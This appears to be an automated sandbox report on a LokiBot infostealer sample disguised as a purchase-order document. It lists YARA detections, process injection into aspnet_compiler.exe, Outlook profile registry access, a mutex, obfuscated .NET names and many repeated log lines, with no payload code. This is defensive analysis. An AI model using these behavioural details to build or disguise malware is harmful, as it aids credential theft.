Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 720, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: (PO403810)_VOLEX_doc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: (PO403810)_VOLEX_doc.exe, c8df85dfcdf224331f2ad38ab0a8975b8.cs	Cryptographic APIs: 'TransformBlock'
Source: (PO403810)_VOLEX_doc.exe, c8df85dfcdf224331f2ad38ab0a8975b8.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

2_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

2_2_0040434D

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\(PO403810)_VOLEX_doc.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Mutant created: NULL

Source: (PO403810)_VOLEX_doc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: (PO403810)_VOLEX_doc.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: (PO403810)_VOLEX_doc.exe

ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe "C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe"
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: (PO403810)_VOLEX_doc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: (PO403810)_VOLEX_doc.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: (PO403810)_VOLEX_doc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: BATMAN.pdbxD source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Sept10F.pdb source: (PO403810)_VOLEX_doc.exe
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2589991317.00000000006E2000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: BATMAN.pdb source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: (PO403810)_VOLEX_doc.exe, c8f367215e22efc16111da46b34ffee89.cs	.Net Code: ca84be5c414cb996eb1eece344b205490 System.Reflection.Assembly.Load(byte[])
Source: (PO403810)_VOLEX_doc.exe, ccb3b41f1733e8628e87795e17067947f.cs	.Net Code: c0667d015f59bee769c60f903d2f45662 System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 720, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AFC

Source: (PO403810)_VOLEX_doc.exe

Static PE information: section name: .text entropy: 7.690880893460008

Source: (PO403810)_VOLEX_doc.exe, c8df85dfcdf224331f2ad38ab0a8975b8.cs	High entropy of concatenated method names: 'c57b9096c1305dd61ec666a8094e1eab4', 'cd55948e8745c23a6f624e68fbafbf546', 'c19e9a1840dbe7741fcacc8cd33a8b341', 'c78d2a4ce124736dc95b239a6d945ace2', 'c8237b274f025dfd238d3474c2dbacac4', 'ITj7DUkapRtcvhedNtZ', 'o6OUkFkDocR090hopJZ', 'Egeop8kbYjBlk05QWtn', 'tSTmdkkUm9hr1Mnkvpt', 'cgoQ28kN8qfGKZkVGZ5'
Source: (PO403810)_VOLEX_doc.exe, c2dc992a05b937d1a753712eb10379340.cs	High entropy of concatenated method names: 'phf8h3bu6YRXkX0etO', 'QggBUFaAuA6EtyjnKg', 'vbmomm90v9XgFBJyAW', 'XEwT4TDxcVSidmpYdO', 'YwIAhIUjK58yl2l3CK', 'VO6iarNWlpTVP24gfc'
Source: (PO403810)_VOLEX_doc.exe, c54987bef8f04bc4587dffb13220fe70b.cs	High entropy of concatenated method names: 'cdfdfa51935211f8eea378372541a18e7', 'hKVGrWlB8aXX5s4Pqs', 'FI5M0UzTglInN0BalW', 't0sZhSVwATZri6uVZT', 'oYTX12P22vShYZnBq9', 'uRrbWlkqGZY8oW2HN2R', 'I2XOJKkkENnIItWkLlx', 'JCi6W0k85TSDvvf8aXu'
Source: (PO403810)_VOLEX_doc.exe, Form1.cs	High entropy of concatenated method names: 'Dispose', 'c3b92562f33da9ba8f6ab9423af882b29', 'uImbH6BSLxB0dhXvQr', 'uuD9u7ErTWTxr8EB85', 'fgVmi6SdpbBB736bip', 'W3IcjfI1jakqk6GdGk', 'dxwAbQoGTOoWPVEFZr', 'hB59UoxAlfEFt5ZhBV', 'DM8aGI0kuT9CY1Vckw', 'YFZByWylVNbQnCrw4F'

Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
